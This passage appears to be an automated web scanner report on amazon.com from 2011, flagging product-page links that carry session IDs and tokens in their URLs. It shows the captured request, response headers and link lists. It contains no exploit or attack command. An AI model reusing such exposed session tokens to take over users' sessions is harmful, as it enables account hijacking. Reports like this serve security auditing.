http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=hFH%252FnXsvArLZuxA5VsV2bRxJ5TtTyy4a6s4kw3lZFJ%252F3%252FTAJrp%252FD3hmR%252BBxX%252B19Vo2FXjMA3i8YV%252FGpnBK7ej4ojUb0uxjchN%252FCFvt6KhpI%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444
http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=m6tqI6V85bHKCYXLGAOtzbiXML7xbuF3y4iZ6QlWlKK611a4wb7QYfeot4kROj1sxWE%252Bkknb4wUinKTz7opq2bsj9kiVwYLtw9GKznBMqheaYVgLBZSCnR1CldfL%252FMruypPW3Iv6A3Kgck8ONn%252B%252B8g%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444
http://www.amazon.com/gp/redirect.html/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_UHTpnb0X2T93K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_fa_dp_UHTpnb0X2T93K%26bodytext%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_UHTpnb0X2T93K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0037UT1LY%252Fref%253Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=952A55443DE535C674144B4B50975586C564AF63&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=716046978E703253E84668EF4520AD74C3A477CE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=130B144A4B8E0EE043FCE0F577C0134E680EF73C&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444
http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F9E4FC2F330A125F9BEC925FDF9B545CB94E2AE9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=110D03D592568CCC2645B836D1FE534FD2AB2EE6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2632FAA0EF944C7D3FD85985089887E0EA069878&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444
http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=19E386ED73EE38C637913A60DBBA7BA7DE3D291C&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=71D4F57801B78A8A0E759AA065E26598CA7062F1&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BECF36648BA15CC8223E604717807B1C208163DE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444

Request

GET /dp/B0037UT1LY HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:28 GMT
Server: Server
x-amz-id-1: 0AX624TG9G36KCASMW03
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: SKdNFc6SoUz62VgRyWT/5zZzRr16uXxYucSqwtyFd8UNcX2Q+8G5VWeik3qbT8iP
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7245636-0301444; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 438322

<html>
<head>

<style type="text/css"><!--

BODY { font
...[SNIP]...
<span id="mbc_B0037UT1LY_A17HJW7ABLGDE2_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=2MQwY8ILcK2Djroj0nDPMkclnVrTsEUHfT%252BACxyBzT9IwaPKymXMiWHbirwLUl%252BLlB6KnjYE0DHaX4sKC%252FSm0roI88JUO8tTZg40NNL0lWq1WADKosS7yl6gCfNOLU%252BOELWNK%252FM4DbK9o1SxfRRxtw%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444" ><span>
...[SNIP]...
<span id="mbc_B0037UT1LY_A2F3P27I0U20DY_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=m6tqI6V85bHKCYXLGAOtzbiXML7xbuF3y4iZ6QlWlKK611a4wb7QYfeot4kROj1sxWE%252Bkknb4wUinKTz7opq2bsj9kiVwYLtw9GKznBMqheaYVgLBZSCnR1CldfL%252FMruypPW3Iv6A3Kgck8ONn%252B%252B8g%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444" ><span>
...[SNIP]...
<span id="mbc_B0037UT1LY_ATVPDKIKX0DER_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=hFH%252FnXsvArLZuxA5VsV2bRxJ5TtTyy4a6s4kw3lZFJ%252F3%252FTAJrp%252FD3hmR%252BBxX%252B19Vo2FXjMA3i8YV%252FGpnBK7ej4ojUb0uxjchN%252FCFvt6KhpI%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444" ><span>
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_UHTpnb0X2T93K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_fa_dp_UHTpnb0X2T93K%26bodytext%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_UHTpnb0X2T93K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_fa_dp_UHTpnb0X2T93K%26bodytext%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_UHTpnb0X2T93K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0037UT1LY%252Fref%253Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_UHTpnb0X2T93K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0037UT1LY%252Fref%253Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_mainitem_atc?ie=UTF8&quantity.1=1&asin.1=B0037UT1LY&offeringID.1=rkwIMZZaSgvr4svmE08Xdp0Zvs0a6lOb3V%252FgiWkSghsPwExTjR%252FusHmmDDFEFaC%252FG9moGAZPyQkP7YM6S5A34u24NpGrxIsQfG2UvF2qOVZD7PwKNntZJQfQ25cJ8Mq12YcFHlmlhJ82jiRVySaaGg%253D%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B0037UT1LY" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_1?ie=UTF8&quantity.1=1&asin.1=B002MUANJO&offeringID.1=d8K1%252Fm6UOREHQlCtrYEptb8jMsSEVdnLgNV3MlH3pPN9aY1LCJ0g3D7lVs8EGz5G8dDCEOwUppestK9Pr7x5hz%252FzJGd4%252BJyFu1AcuhcUELk%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002MUANJO" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_2?ie=UTF8&quantity.1=1&asin.1=B0015KXFB0&offeringID.1=dPZwUuWIn7aLqmxgg%252BjCgiuaxqNpRWrzo4Di%252FXWk3tpcNOVR2ic8UMwQfBCYMiIPv88Sr%252FpMpv2D8tebeZKc2OJ%252FiNITORk6WRd38ybBcCiNhR74Myv%252BuWo6AL46VKb%252FlwR2eCYUqJNSGx%252FAx83oiw%253D%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B0015KXFB0" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_3?ie=UTF8&quantity.1=1&asin.1=B002MUANJE&offeringID.1=FHX6W4xZv2nO0UX3UqVMr%252FzNDLEXmT%252FB%252B1magCc6i%252BQxzKXdSBqJmIdiJawfdz0sGdc0vL51Z0JAd6MMtgzF8wG87YFsHv2nQKKIGvJq3KE%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002MUANJE" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_4?ie=UTF8&quantity.1=1&asin.1=B002MUANJY&offeringID.1=7gAbqnGxEGlnxtTGcXMEA3MPQ5P079563XjAzzloVPxnANdjhrq%252BrTp9BPd3kQQNt2ob7DmCYaRZFqyTqskQ6s%252FcxkAuczJL5RokNGe0aGOoi%252BSpDE4ayZWDOZSeLpb5YoTxoPPqDXc%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002MUANJY" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_5?ie=UTF8&quantity.1=1&asin.1=B002PUEFV8&offeringID.1=WDHKpkXI%252ByhvTuGDIU02ixhCur4MDNaUGuIZbeFTo%252FJT9DUppLEkCmnMMzip5lrLoiyB3xJ4eqss2%252BMm6hAKchAp0lnBJFUOe00t9DJumUyWAeROhD1MZfGXSkk4%252B3iAeWSbbnkLFEU%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002PUEFV8" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_6?ie=UTF8&quantity.1=1&asin.1=B002DPVAWW&offeringID.1=S7HZPe8%252B15O23zcf8ATavWOISw5yOv5Qx%252FHzP6dOxT00OMpphlpr3bFP62fUNa0YQl4VDvmbo0BDGdYG5%252Bn7tvUNZPCfsI0M%252BAlxkltb%252BMO7TFTdxXi2cmee6qstT89j%252BtV4KX%252FSvqKLBTOklxhrLA%253D%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002DPVAWW" ><span>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=110D03D592568CCC2645B836D1FE534FD2AB2EE6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F9E4FC2F330A125F9BEC925FDF9B545CB94E2AE9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2632FAA0EF944C7D3FD85985089887E0EA069878&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=716046978E703253E84668EF4520AD74C3A477CE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=952A55443DE535C674144B4B50975586C564AF63&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=130B144A4B8E0EE043FCE0F577C0134E680EF73C&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=71D4F57801B78A8A0E759AA065E26598CA7062F1&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=19E386ED73EE38C637913A60DBBA7BA7DE3D291C&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BECF36648BA15CC8223E604717807B1C208163DE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444"
>Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.75. http://www.amazon.com/gp/product/0596804946 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0596804946

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_KHTpnb1MYAATD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0596804946%2Fref%3Dcm_sw_r_fa_dp_KHTpnb1MYAATD%26bodytext%3DUsing%2520Joomla%253A%2520Building%2520Powerful%2520and%2520Efficient%2520Web%2520Sites%2520by%2520Ron%2520Severdia
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_KHTpnb1MYAATD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0596804946%252Fref%253Dcm_sw_r_tw_dp_KHTpnb1MYAATD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DUsing%2520Joomla%253A%2520Building%2520Powerful%2520and%2520Efficient%2520Web%2520Sites%2520by%2520Ron%2520Severdia%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0596804946%2Fref%3Dcm_sw_r_tw_dp_KHTpnb1MYAATD%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R1Y1OWU5QLKEDW/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=35F837CE6A4A6E859602EA40BAE71483DF888D59&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R1Y1OWU5QLKEDW.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
http://www.amazon.com/gp/voting/cast/Reviews/2115/R1Y1OWU5QLKEDW/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=FAEFC007CD906A1135DEEFB4221AF4A92143F667&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R1Y1OWU5QLKEDW.2115.Helpful.Reviews&voteSessionID=177-3345764-3077262
